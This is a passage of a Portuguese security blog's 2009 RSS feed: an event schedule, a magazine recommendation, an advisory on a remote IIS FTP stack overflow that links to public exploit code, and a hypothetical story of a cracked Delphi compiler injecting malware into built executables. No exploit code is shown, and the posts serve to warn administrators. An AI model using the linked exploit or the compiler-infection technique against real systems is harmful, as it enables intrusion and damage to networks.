<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/safeorunsafe.wordpress.com/206/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/safeorunsafe.wordpress.com/206/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/safeorunsafe.wordpress.com/206/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/safeorunsafe.wordpress.com/206/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/safeorunsafe.wordpress.com/206/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/safeorunsafe.wordpress.com/206/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/safeorunsafe.wordpress.com/206/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/safeorunsafe.wordpress.com/206/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/safeorunsafe.wordpress.com/206/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/safeorunsafe.wordpress.com/206/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/safeorunsafe.wordpress.com/206/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/safeorunsafe.wordpress.com/206/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/safeorunsafe.wordpress.com/206/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/safeorunsafe.wordpress.com/206/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=safeorunsafe.wordpress.com&amp;blog=5364601&amp;post=206&amp;subd=safeorunsafe&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://safeorunsafe.wordpress.com/2009/09/09/falhas-graves-malware-portal-vivo/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/8f520adce9abdf1e99f67346ec5b93a5?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">latansio</media:title>
		</media:content>

		<media:content url="http://safeorunsafe.files.wordpress.com/2009/09/picture-4.png" medium="image">
			<media:title type="html">Clone do Site da Nossa Caixa</media:title>
		</media:content>
	</item>
		<item>
		<title>### Selcomp 2009 &#8211; UNEMAT ###</title>
		<link>http://safeorunsafe.wordpress.com/2009/09/04/selcomp-2009-unemat/</link>
		<comments>http://safeorunsafe.wordpress.com/2009/09/04/selcomp-2009-unemat/#comments</comments>
		<pubDate>Fri, 04 Sep 2009 18:42:28 +0000</pubDate>
		<dc:creator>latansio</dc:creator>
				<category><![CDATA[Eventos]]></category>

		<guid isPermaLink="false">http://safeorunsafe.wordpress.com/?p=190</guid>
		<description><![CDATA[Na semana do dia 14 a 18 de Setembro será realizada na Universidade do Estado do Mato Grosso (UNEMAT), campos de Alto Araguaia, a VI edição do SELCOMP (Semana de Licenciatura em Computação). O evento tem o apoio da SBC (Sociedade Brasileira de Computação) e com o passar dos anos tem se tornado um dos [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=safeorunsafe.wordpress.com&amp;blog=5364601&amp;post=190&amp;subd=safeorunsafe&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p style="line-height:19px;font:12px Verdana;margin:0 0 13px;">
<p style="line-height:19px;font:12px Verdana;margin:0 0 13px;"><span style="letter-spacing:0;">Na semana do dia 14 a 18 de Setembro será realizada na Universidade do Estado do Mato Grosso (UNEMAT), campos de Alto Araguaia, a VI edição do SELCOMP (Semana de Licenciatura em Computação). O evento tem o apoio da SBC (Sociedade Brasileira de Computação) e com o passar dos anos tem se tornado um dos principais eventos da região Centro-Oeste.</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0 0 13px;"><span style="letter-spacing:0;">Nesta edição do SELCOMP muitas novidades estão acontecendo, a iniciar pelas palestras. Abaixo segue trecho de um e-mail convite feito pela organização do evento, que cita as principais atrações do evento:</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0 0 13px;"><span style="letter-spacing:0;">##</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0 0 13px;"><span style="letter-spacing:0;">- Órgão regulador de Internet no Brasil envia palestrante para Alto Araguaia sem custos para a organização do evento * INÉDITO *<br />
- Uma das pessoas mais ativas durante as discussões de criação dos Cursos de Licenciatura em Computação no Brasil estará em Alto Araguaia para proferir palestra (Dr. Daltro) * INÉDITO *<br />
- Vencedor do Prêmio TV Centro América 2006 de Propaganda participará oferecendo 2 minicursos e 1 palestra (Cícero) * INÉDITO *<br />
- Tecnologia de Serviços na Nuvem será abordada em palestra, nosso convidado vem diretamente de Londrina-PR para, também, ministrar minicurso sobre Firewall em Linux (André) * INÉDITO *<br />
- O tema do evento será apresentado pela palestra do Mateus, mestre pela UNIMEP * INÉDITO *<br />
- Um tema muito interessante: Ética e Segurança da Informação * INÉDITO *<br />
- Algumas aplicações da computação na área médica, que será apresentado pelo Alex, mestre pela UNESP de São José do Rio Preto * INÉDITO *<br />
- Ainda não acabou&#8230; Na Festa de recrutamento teremos a participação de representantes das empresas da cidade/região apresentando o perfil de profissional e vagas de estágio, focando sempre a área de computação.</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0 0 13px;"><span style="letter-spacing:0;">##</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0 0 13px;"><span style="letter-spacing:0;">Conforme podem ver a cima, fui convidado para participar desta edição do evento, para ministrar a palestra sobre <em>Cloud Computing</em> (Segurança na Nuvem) e um minicurso, com duração total de 8 horas, sobre segurança de perímetro utilizando firewall Linux &#8230; espero ver as salas / auditórios cheios hein !!! &#8230; <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </span></p>
<p style="line-height:19px;font:12px Verdana;margin:0 0 13px;"><span style="letter-spacing:0;">Abaixo segue a programação do evento e um link para o site oficial.</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0 0 13px;"><span style="letter-spacing:0;"><strong>Programação</strong></span></p>
<p style="line-height:19px;font:12px Verdana;margin:0 0 13px;"><span style="letter-spacing:0;">14/09 Segunda-feira</span></p>
<p style="line-height:19px;font:12px Verdana;min-height:15px;margin:0;"><span style="letter-spacing:0;"> </span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">8:00 – 12:00 Prof. Dr. Aroldo José de Abreu – UNEMAT</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">Minicurso: Noções básicas de Pagemaker 7.0</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">14:00 – 18:00 Prof. Dr. Aroldo José de Abreu – UNEMAT</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">Minicurso: Noções básicas de Pagemaker 7.0</span><span style="letter-spacing:0 color;">Palestras</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">19:30 Cerimônia de abertura</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">20:00 – 21:30 Prof. Me. Hélio Clementino dos Santos</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">A Indústria de Software no Brasil e sua importância na Economia</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">21:30 – 21:40 Prof. Dr. Daltro José Nunes – UFRGS</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">O que é Ciência da Computação e sua relação com os Cursos de Licenciatura em Computação</span></p>
<p style="line-height:19px;font:12px Verdana;min-height:15px;margin:0;"><span style="letter-spacing:0;"> </span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">15/09 Terça-feira</span></p>
<p style="line-height:19px;font:12px Verdana;min-height:15px;margin:0;"><span style="letter-spacing:0;"> </span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">8:00 – 12:00 Prof. Adriano Ferraz da Costa &#8211; UNEMAT</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">Minicurso: Desenvolvimento de Sistemas WEB com PHP</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">14:00 – 18:00 Prof. Dr. Gleber N. Marques &#8211; UNEMAT</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">Prof. Carlinho Viana de Sousa &#8211; UNEMAT</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">Minicurso: Mathematica como plataforma para desenvolvimento de software educativo</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">8:00 – 12:00 Cícero Moraes</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">Minicurso: Inkscape: Criatividade vetorial</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">14:00 – 18:00 Cícero Moraes</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">Minicurso: Gimp – Edição de imagens</span><span style="letter-spacing:0 color;">Palestras</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">19:30 – 20:00 Credenciamento</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">20:00 – 21:30 Rodrigo Regis dos Santos – NIC.br</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">A importância do IPv6 para o futuro da Internet</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">21:30 – 21:40 Coffee Break</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">21:40 – 23:10 Cícero Moraes</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">Blender 3D: O que é, o que faz e como aprendê-lo?</span></p>
<p style="line-height:19px;font:12px Verdana;min-height:15px;margin:0;"><span style="letter-spacing:0;"> </span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">16/09 Quarta-feira</span></p>
<p style="line-height:19px;font:12px Verdana;min-height:15px;margin:0;"><span style="letter-spacing:0;"> </span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">8:00 – 12:00 Prof. Adriano Ferraz da Costa &#8211; UNEMAT</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">Minicurso: Desenvolvimento de Sistemas WEB com PHP</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">14:00 – 18:00 Prof. Dr. Gleber N. Marques &#8211; UNEMAT</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">Prof. Carlinho Viana de Sousa &#8211; UNEMAT</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">Minicurso: Mathematica como plataforma para desenvolvimento de software educativo</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">19:30 – 20:00 Credenciamento</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">20:00 – 21:30 Prof. Dr. Gleber Nelson Marques – UNEMAT</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">Sistemas Computacionais baseados em CAD</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">21:30 – 21:40 Coffee Break</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">21:40 – 23:10 Prof. Me. Alex Fernando de Araújo</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">Processamento de Imagens aplicados à área Médica</span></p>
<p style="line-height:19px;font:12px Verdana;min-height:15px;margin:0;"><span style="letter-spacing:0;"> </span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">17/09 Quinta-feira</span></p>
<p style="line-height:19px;font:12px Verdana;min-height:15px;margin:0;"><span style="letter-spacing:0;"> </span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">8:00 – 12:00 André Latansio de Oliveira &#8211; Altatech</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">Minicurso: Segurança de perímetro com Firewall Linux</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">14:00 – 18:00 Prof. Me. Fernando Yoiti Obana &#8211; UNEMAT</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">Desenho e editoração gráfica com Corel Draw</span><span style="letter-spacing:0 color;">Palestras</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">19:30 – 20:00 Credenciamento</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">20:00 – 21:30 Jean Carlo Fonseca Galhardi – International Paper</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">Segurança da Informação</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">21:30 – 21:40 Coffee Break</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">21:40 – 23:10 André Latansio de Oliveira &#8211; Altatech</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">Tecnologia de Segurança na Nuvem</span></p>
<p style="line-height:19px;font:12px Verdana;min-height:15px;margin:0;"><span style="letter-spacing:0;"> </span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">18/09 Sexta-feira</span></p>
<p style="line-height:19px;font:12px Verdana;min-height:15px;margin:0;"><span style="letter-spacing:0;"> </span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">8:00 – 12:00 André Latansio de Oliveira &#8211; Altatech</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">Minicurso: Segurança de perímetro com Firewall Linux</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">14:00 – 18:00 Prof. Me. Fernando Yoiti Obana &#8211; UNEMAT</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">Desenho e editoração gráfica com Corel Draw</span><span style="letter-spacing:0 color;">Palestras</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">19:30 – 20:00 Credenciamento</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">20:00 – 21:30 Prof. Me. Mateus de Souza Rocha – Pró-Ativa Capacitação Profissional</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">O profissional do século XXI e a Gestão do Conhecimento</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">21:30 – 21:40 Coffee Break</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">21:40 – 23:10 Recruiting Fest.</span></p>
<p style="line-height:19px;font:12px Verdana;margin:0;"><span style="letter-spacing:0;">Apresentações sobre recrutamento: empresas locais</span></p>
<p style="line-height:19px;font:12px Verdana;min-height:15px;margin:0;"><span style="letter-spacing:0;"> </span></p>
<p style="line-height:19px;font:12px Verdana;color:#000099;margin:0 0 13px;"><span style="letter-spacing:0;text-decoration:underline;"><a href="http://www.aia.unemat.br/selcomp/">Site Oficial</a></span></p>
<p style="line-height:19px;font:normal normal normal 12px/normal Verdana;margin:0;">Já estive presente em outras edições do evento e garanto que vale a pena participar !!!</p>
<div><span style="font-family:Verdana, 'Times New Roman', 'Bitstream Charter', Times, serif;font-size:small;"><span style="line-height:normal;"><br />
</span></span></div>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/safeorunsafe.wordpress.com/190/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/safeorunsafe.wordpress.com/190/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/safeorunsafe.wordpress.com/190/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/safeorunsafe.wordpress.com/190/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/safeorunsafe.wordpress.com/190/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/safeorunsafe.wordpress.com/190/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/safeorunsafe.wordpress.com/190/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/safeorunsafe.wordpress.com/190/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/safeorunsafe.wordpress.com/190/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/safeorunsafe.wordpress.com/190/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/safeorunsafe.wordpress.com/190/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/safeorunsafe.wordpress.com/190/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/safeorunsafe.wordpress.com/190/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/safeorunsafe.wordpress.com/190/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=safeorunsafe.wordpress.com&amp;blog=5364601&amp;post=190&amp;subd=safeorunsafe&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://safeorunsafe.wordpress.com/2009/09/04/selcomp-2009-unemat/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/8f520adce9abdf1e99f67346ec5b93a5?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">latansio</media:title>
		</media:content>
	</item>
		<item>
		<title>### (IN)SECURE Magazine 22 ###</title>
		<link>http://safeorunsafe.wordpress.com/2009/09/03/insecure-magazine-22/</link>
		<comments>http://safeorunsafe.wordpress.com/2009/09/03/insecure-magazine-22/#comments</comments>
		<pubDate>Thu, 03 Sep 2009 11:50:12 +0000</pubDate>
		<dc:creator>latansio</dc:creator>
				<category><![CDATA[Curiosidades]]></category>

		<guid isPermaLink="false">http://safeorunsafe.wordpress.com/?p=186</guid>
		<description><![CDATA[Para aqueles que ainda não conhecem, a (IN)SECURE Magazine é uma revista eletrônica disponibilizada gratuitamente (it&#8217;s free !!!) e que possui um excelente conteúdo, sempre trazendo artigos relacionados a segurança e as principais conferências realizadas pelo mundo. Segue abaixo os principais tópicos tratados nesta edição e o link para download. Recomendo a leitura pois o [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=safeorunsafe.wordpress.com&amp;blog=5364601&amp;post=186&amp;subd=safeorunsafe&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Para aqueles que ainda não conhecem, a (IN)SECURE Magazine é uma revista eletrônica disponibilizada gratuitamente (it&#8217;s free !!!) e que possui um excelente conteúdo, sempre trazendo artigos relacionados a segurança e as principais conferências realizadas pelo mundo. Segue abaixo os principais tópicos tratados nesta edição e o link para download. Recomendo a leitura pois o material é muito bom !</p>
<ul>
<li style="text-align:left;"><em>Using real-time events to drive your network scans</em></li>
<li style="text-align:left;"><em>The Nmap project: Open source with style</em></li>
<li style="text-align:left;"><em>A look at geolocation, URL shortening and top Twitter threats</em></li>
<li style="text-align:left;"><em>Review: Data Locker</em></li>
<li style="text-align:left;"><em>Making clouds secure</em></li>
<li style="text-align:left;"><em>Top 5 myths about wireless protection</em></li>
<li style="text-align:left;"><em>Securing the foundation of IT systems</em></li>
<li style="text-align:left;"><em>Is your data recovery provider a data security problem?</em></li>
<li style="text-align:left;"><em>Security for multi-enterprise applications</em></li>
<li style="text-align:left;"><em>In mashups we trust?</em></li>
</ul>
<p style="text-align:left;"><a title="(IN)SECURITY" href="http://www.net-security.org/dl/insecure/INSECURE-Mag-22.pdf" target="_blank">Download Aqui</a></p>
<p style="text-align:left;">
<p style="text-align:left;">Boa Leitura !</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/safeorunsafe.wordpress.com/186/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/safeorunsafe.wordpress.com/186/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/safeorunsafe.wordpress.com/186/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/safeorunsafe.wordpress.com/186/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/safeorunsafe.wordpress.com/186/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/safeorunsafe.wordpress.com/186/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/safeorunsafe.wordpress.com/186/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/safeorunsafe.wordpress.com/186/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/safeorunsafe.wordpress.com/186/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/safeorunsafe.wordpress.com/186/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/safeorunsafe.wordpress.com/186/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/safeorunsafe.wordpress.com/186/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/safeorunsafe.wordpress.com/186/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/safeorunsafe.wordpress.com/186/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=safeorunsafe.wordpress.com&amp;blog=5364601&amp;post=186&amp;subd=safeorunsafe&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://safeorunsafe.wordpress.com/2009/09/03/insecure-magazine-22/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/8f520adce9abdf1e99f67346ec5b93a5?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">latansio</media:title>
		</media:content>
	</item>
		<item>
		<title>### Microsoft IIS FTP Server Remote Stack Overflow ###</title>
		<link>http://safeorunsafe.wordpress.com/2009/09/01/microsoft-iis-ftp-server-remote-stack-overflow/</link>
		<comments>http://safeorunsafe.wordpress.com/2009/09/01/microsoft-iis-ftp-server-remote-stack-overflow/#comments</comments>
		<pubDate>Tue, 01 Sep 2009 13:46:38 +0000</pubDate>
		<dc:creator>latansio</dc:creator>
				<category><![CDATA[Curiosidades]]></category>
		<category><![CDATA[Exploits]]></category>

		<guid isPermaLink="false">http://safeorunsafe.wordpress.com/?p=179</guid>
		<description><![CDATA[Ontem, dia 31/08/2009, foi publicado pelo site milworm um exploit 0 day para o serviço de FTP do IIs, sendo afetadas as versões 5 e 6 da ferramenta. O exploit somente afeta o Microsoft Windows Server versão 2k, porém fica um alerta para os administradores de rede que ainda tem máquinas com esta versão do [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=safeorunsafe.wordpress.com&amp;blog=5364601&amp;post=179&amp;subd=safeorunsafe&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Ontem, dia 31/08/2009, foi publicado pelo site <a href="http://www.milw0rm.com" target="_self">milworm</a> um exploit<em> <strong>0 day</strong> </em>para o serviço de FTP do IIs, sendo afetadas as versões 5 e 6 da ferramenta. O exploit somente afeta o Microsoft Windows Server versão 2k, porém fica um alerta para os administradores de rede que ainda tem máquinas com esta versão do sistema operacional e com serviços de FTP publicados para a internet, afinal por se tratar de um exploit remoto ele pode trazer muitas dores de cabeça.</p>
<p>Link para o exploit: <a href="http://www.milw0rm.com/exploits/9541" target="_self">IIs FTP server Remote Stack Overflow </a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/safeorunsafe.wordpress.com/179/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/safeorunsafe.wordpress.com/179/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/safeorunsafe.wordpress.com/179/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/safeorunsafe.wordpress.com/179/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/safeorunsafe.wordpress.com/179/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/safeorunsafe.wordpress.com/179/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/safeorunsafe.wordpress.com/179/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/safeorunsafe.wordpress.com/179/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/safeorunsafe.wordpress.com/179/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/safeorunsafe.wordpress.com/179/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/safeorunsafe.wordpress.com/179/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/safeorunsafe.wordpress.com/179/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/safeorunsafe.wordpress.com/179/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/safeorunsafe.wordpress.com/179/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=safeorunsafe.wordpress.com&amp;blog=5364601&amp;post=179&amp;subd=safeorunsafe&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://safeorunsafe.wordpress.com/2009/09/01/microsoft-iis-ftp-server-remote-stack-overflow/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/8f520adce9abdf1e99f67346ec5b93a5?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">latansio</media:title>
		</media:content>
	</item>
		<item>
		<title>### Vírus ??? esse é o meu ERP !!! ###</title>
		<link>http://safeorunsafe.wordpress.com/2009/08/27/virus-esse-e-o-meu-erp/</link>
		<comments>http://safeorunsafe.wordpress.com/2009/08/27/virus-esse-e-o-meu-erp/#comments</comments>
		<pubDate>Fri, 28 Aug 2009 01:34:31 +0000</pubDate>
		<dc:creator>latansio</dc:creator>
				<category><![CDATA[Curiosidades]]></category>
		<category><![CDATA[Malwares]]></category>

		<guid isPermaLink="false">http://safeorunsafe.wordpress.com/?p=163</guid>
		<description><![CDATA[Antes de mais nada, este post não vai falar mal de nenhum sistema ERP &#8230; &#8230; a idéia para o post veio de uma situação pela qual passei no dia de hoje e me fez pensar sobre como podem existir pessoas / empresas distribundo malwares através dos softwares que comercializam, sem ter a menor idéia [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=safeorunsafe.wordpress.com&amp;blog=5364601&amp;post=163&amp;subd=safeorunsafe&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Antes de mais nada, este post não vai falar mal de nenhum sistema ERP &#8230; <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  &#8230; a idéia para o post veio de uma situação pela qual passei no dia de hoje e me fez pensar sobre como podem existir pessoas / empresas distribundo <em>malwares</em> através dos softwares que comercializam, sem ter a menor idéia do que está ocorrendo !</p>
<p>Para ilustar a situação vamos imaginar uma empresa que desenvolva um sistema de ERP e o comercialize, conseguindo uma base de clientes considerável. Quando a empresa foi fundada, uma das formas de &#8220;economizar&#8221; foi não legalizar suas versões do <em>Borland Delphi</em> (IDE para programação que a empresa utiliza para desenvolver o sistema), utilizando <em>cracks</em> para ativar a ferramenta.</p>
<p>Tudo ia bem e a quantidade de clientes crescia, devido ao sucesso de seu software de ERP, porém no processo de implantação da solução em um novo cliente começam a ocorrer problemas. A ferramenta anti-malware que está instalada no servidor e nas estações de trabalho do cliente começa a detectar o executável (arquivo com extensão exe gerado na compilação do código fonte do sistema no <em>Delphi</em>) do sistema como um <em>malware</em> e a deletá-lo. A primeira reação da equipe de desenvolvimento é tranquila, afinal o sistema realiza algumas ações no sistema operacional como edição de registro e atualização de dlls, que podem ser consideradas como o comportamento de um <em>malware</em>, porém após dois dias de problemas a consultoria em segurança da informação contratada pelo cliente que está implementando o ERP entrega um relatório informando que o executável do sistema  É SIM um <em>malware</em> e que está executando uma série de ações maliciosas na rede, apagando arquivos e se propagando para outras estações da rede onde o sistema sequer foi instalado !!!</p>
<p>Neste momento surge uma série de perguntas na cabeça dos proprietários da empresa !!! Como isso é possível ?? &#8230; meus programadores estão me sabotando ??? a ferramenta anti-malware e a equipe de consultoria em segurança estariam equivocados ?!?! como fica a reputação da minha empresa que comercializa um software de ERP que se comporta como um vírus ??</p>
<p>Esta é uma situação que eu criei para ilustrar um problema que pode ocorrer no mundo real. E agora a pergunta a ser feita é :  como um sistema de ERP passa a tomar ações de malware sem que os programadores tenham modificado os códigos fontes do sistema !?!? a resposta é a seguinte: no momento em que eles ativaram o Delphi utilizando um <em>crack</em>, um malware foi instalado no computador dos desenvolvedores, e este malware modificou o compilador do D<em>elphi</em>, inserindo código malicioso no executável do sistema toda vez que ele é compilado. Foi desta forma que um executável de sistema ERP legítimo passou a tomar ações de malware na rede do cliente.</p>
